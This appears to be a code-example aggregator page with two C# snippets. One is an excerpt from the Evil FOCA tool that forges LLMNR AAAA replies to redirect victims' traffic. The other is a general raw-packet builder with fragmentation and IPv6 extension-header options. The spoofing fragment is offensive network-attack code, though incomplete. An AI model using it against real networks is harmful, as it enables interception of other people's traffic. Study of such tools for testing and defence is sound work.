                            if (llmnr.Query.Type.HasValue && llmnr.Query.Type.Value == LLMNR.DNSType.AAAA)
                            {
                                IPAddress[] ips = (from ip in Dns.GetHostAddresses(llmnr.Query.Name)
                                                   where ip.AddressFamily == System.Net.Sockets.AddressFamily.InterNetwork
                                                   select ip).ToArray();
                                byte[] ipv6Addr = new byte[] { 0x00, 0x64, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff,
                                                               (byte)ips[0].GetAddressBytes()[0], (byte)ips[0].GetAddressBytes()[1],
                                                               (byte)ips[0].GetAddressBytes()[2], (byte)ips[0].GetAddressBytes()[3] };

                                llmnr.AnswerList.Add(new LLMNR.DNSAnswer()
                                {
                                    Class    = evilfoca.LLMNR.DNSClass.IN,
                                    Name     = llmnr.Query.Name,
                                    Type     = evilfoca.LLMNR.DNSType.AAAA,
                                    RData    = ipv6Addr,
                                    RDLength = (short)ipv6Addr.Length
                                });


                                EthernetPacket ethDns = new EthernetPacket(localPhysicalAddress, ethernet.SourceHwAddress, EthernetPacketType.IpV4);
                                IPv6Packet ipv6Dns    = new IPv6Packet(((IPv6Packet)p.PayloadPacket).DestinationAddress, ((IPv6Packet)p.PayloadPacket).SourceAddress);
                                UdpPacket udpDns      = new UdpPacket(udp.DestinationPort, udp.SourcePort);

                                udpDns.PayloadData = llmnr.BuildPacket();

                                ipv6Dns.PayloadPacket = udpDns;
                                ethDns.PayloadPacket  = ipv6Dns;

                                udpDns.UpdateCalculatedValues();
                                udpDns.UpdateUDPChecksum();
                                ipv6Dns.UpdateCalculatedValues();
                                Program.CurrentProject.data.SendPacket(ethDns);
                            }
                            break;

                        default:
                            break;
                        }
                    }
                });
            }
        }
示例#14
0
    public static Packet CreatePacket(Param param)
    {
        Packet ret = null;

        //create layer 4
        if (param.packetType == Param.PacketType.TCP)
        {
            TcpPacket tcpPacket = new TcpPacket(param.sPort, param.dPort);
            tcpPacket.AllFlags = param.tcpFlag;
            if (param.dIP.ToString().Contains("."))
            {
                IPv4Packet ipPacket = new IPv4Packet(param.sIP, param.dIP);
                if (param.IPv4Frag) { ipPacket.FragmentFlags = (int)1; }
                ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV4);
                ipPacket.PayloadPacket = tcpPacket;
                tcpPacket.PayloadData = param.payload;
                ret.PayloadPacket = ipPacket;
                ipPacket.UpdateCalculatedValues();
                ipPacket.UpdateIPChecksum();
                tcpPacket.Checksum = (ushort)tcpPacket.CalculateTCPChecksum();
            }
            else
            {
                IPv6Packet ipPacket = new IPv6Packet(param.sIP, param.dIP);
                ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV6);
                ipPacket.PayloadPacket = tcpPacket;
                tcpPacket.PayloadData = param.payload;
                ret.PayloadPacket = ipPacket;
            }

        }
        else if (param.packetType == Param.PacketType.UDP)
        {
            UdpPacket udpPacket = new UdpPacket(param.sPort, param.dPort);
            if (param.dIP.ToString().Contains("."))
            {
                IPv4Packet ipPacket = new IPv4Packet(param.sIP, param.dIP);
                if (param.IPv4Frag) { ipPacket.FragmentFlags = (int)1; }
                ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV4);
                ipPacket.PayloadPacket = udpPacket;
                udpPacket.PayloadData = param.payload;
                udpPacket.UpdateUDPChecksum();
                ipPacket.PayloadLength = (ushort)(ipPacket.PayloadLength + param.payload.Length);
                ipPacket.UpdateIPChecksum();
                ret.PayloadPacket = ipPacket;
            }
            else
            {
                IPv6Packet ipPacket = new IPv6Packet(param.sIP, param.dIP);
                ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV6);
                ipPacket.PayloadPacket = udpPacket;
                udpPacket.PayloadData = param.payload;
                udpPacket.UpdateUDPChecksum();
                ipPacket.PayloadLength = (ushort)(ipPacket.PayloadLength + param.payload.Length);
                ret.PayloadPacket = ipPacket;
            }
        }
        else if (param.packetType == Param.PacketType.ICMP)
        {
            ICMPv4Packet icmpPacket = new ICMPv4Packet(new ByteArraySegment(new byte[32]));
            if (param.type != 0 && param.code != 0)
            {
                icmpPacket.TypeCode = (ICMPv4TypeCodes)((param.type * 256) + (param.code));
            }
            else if (param.type != 0)
            {
                icmpPacket.TypeCode = (ICMPv4TypeCodes)((param.type * 256));
            }
            else
            {
                icmpPacket.TypeCode = ICMPv4TypeCodes.EchoRequest;
            }

            IPv4Packet ipPacket = new IPv4Packet(param.sIP, param.dIP);
            if (param.IPv4Frag) { ipPacket.FragmentFlags = (int)1; }
            ipPacket.PayloadPacket = icmpPacket;
            ipPacket.Checksum = ipPacket.CalculateIPChecksum();
            ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV4);
            ret.PayloadPacket = ipPacket;
        }
        else if (param.packetType == Param.PacketType.ICMPv6)
        {
            ICMPv6Packet icmpv6Packet = CreateICMPv6Packet(param);
            IPv6Packet ipPacket = new IPv6Packet(param.sIP, param.dIP);
            ipPacket.PayloadPacket = icmpv6Packet;
            ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV6);
            ret.PayloadPacket = ipPacket;
        }
        else if (param.packetType == Param.PacketType.IP)
        {
            if (param.dIP.ToString().Contains("."))
            {
                ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV4);
                IPv4Packet ipPacket = new IPv4Packet(param.sIP, param.dIP);
                if (param.IPv4Frag) { ipPacket.FragmentFlags = (int)1; }
                ipPacket.Protocol = param.IPProtocol;
                ipPacket.PayloadData = param.payload;
                ipPacket.UpdateCalculatedValues();
                ret.PayloadPacket = ipPacket;
                ipPacket.UpdateIPChecksum();
            }
            else
            {
                ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV6);

                //if extension headers were not specified, just put the payload
                if (param.ExtentionHeader.Count == 0)
                {
                    IPv6Packet ipPacket = new IPv6Packet(param.sIP, param.dIP);
                    ipPacket.Protocol = param.IPProtocol;
                    ipPacket.PayloadData = param.payload;
                    ipPacket.PayloadLength = (ushort)param.payload.Length;
                    ipPacket.UpdateCalculatedValues();
                    ret.PayloadPacket = ipPacket;
                }
                else
                {
                    ret = PacketFactory.CreateEHPacket(param, (EthernetPacket)ret);
                }
                ret.UpdateCalculatedValues();
            }
        }
        else if (param.packetType == Param.PacketType.EtherType)
        {
            ret = new EthernetPacket(param.sMAC, param.dMAC, param.EtherTypeProtocol);
            byte[] etherBuffer = (new byte[64]);
            var payload = new byte[etherBuffer.Length + (param.payload).Length];
            etherBuffer.CopyTo(payload, 0);
            (param.payload).CopyTo(payload, etherBuffer.Length);
            ret.PayloadData = payload;
            ret.UpdateCalculatedValues();
        }

        return ret;
    }